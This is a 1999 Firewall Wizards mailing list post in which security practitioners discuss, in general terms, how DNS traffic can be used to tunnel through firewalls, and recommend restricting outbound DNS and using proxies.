Firewall Wizards mailing list archives
Re: dns outbound
From: "Matt McClung" <mmcclung () ndwcorp com>
Date: Tue, 18 May 1999 12:55:33 -0600
So this implies a misconfiguration of a firewall in some cases... One argument would be that your firewall should only allow outgoing DNS traffic from your internal DNS Server (ignoring the fact that it could be spoofed) and I always advocate an internal HTTP/FTP/ETC proxy server and an associate firewall ruleset to control outbound access. I will acknowledge that this won't cover all solutions, but it will suffice for a very large percentage of incidents. The tunneled virus is a very scary thing, and can't be far off! Matt McClung Network Security Consultant Net.Works, Inc. mmcclung () ndwcorp com 801-595-6200 ----- Original Message ----- From: Marcus J. Ranum <mjr () clark net> To: Ryan Russell <Ryan.Russell () sybase com>; Deepak Vaidya <dvaidya () clark net> Cc: <firewall-wizards () nfr net> Sent: Tuesday, May 18, 1999 6:14 AM Subject: Re: dns outbound
Ryan Russell wrote:Another claimed that one of his uses was able to surf the web without having to authenticate on the way out, via the DNS rule.If you have access to an external system, someplace, you can use DNS packets to contain IP packets, or you can set up an application-level proxy that tunnels over DNS packets. Kind of a lot of work, but a technically knowledgeable person behind a firewall that he/she didn't like could do it easily enough. This is a basic problem with firewalls: so much stuff can be pushed back and forth through them that they're very easy to tunnel through. What scares me is the (obvious) implication of a "firewall-aware" tunnelling trojan horse/virus that opens outgoing connections via HTTP or other protocols that firewalls typically allow. mjr. -- Marcus J. Ranum, CEO, Network Flight Recorder, Inc. work - http://www.nfr.net home - http://www.clark.net/pub/mjr
Current thread:
- Re: dns outbound, (continued)
- Re: dns outbound Lance Spitzner (May 17)
- Re: dns outbound Larry Chin (May 17)
- RE: dns outbound Thomas Crowe (May 18)
- Re: dns outbound Joseph S D Yao (May 17)
- Re: dns outbound David Goldsmith (May 17)
- RE: dns outbound Buckley, Neil (May 17)
- Re: dns outbound Ryan Russell (May 17)
- Re: dns outbound Marcus J. Ranum (May 18)
- Re: dns outbound chuck (May 18)
- Re: dns outbound Ge' Weijers (May 19)
- Re: dns outbound Matt McClung (May 18)
- Re: dns outbound Darren Reed (May 18)
- Re: dns outbound Bennett Todd (May 19)
- Re: dns outbound Marcus J. Ranum (May 18)
- Re: dns outbound Deepak Vaidya (May 17)
- Re: dns outbound wyllys (May 18)
- Re: dns outbound David Gillett (May 19)
- Re: dns outbound wyllys (May 21)
- Re: dns outbound Bennett Todd (May 19)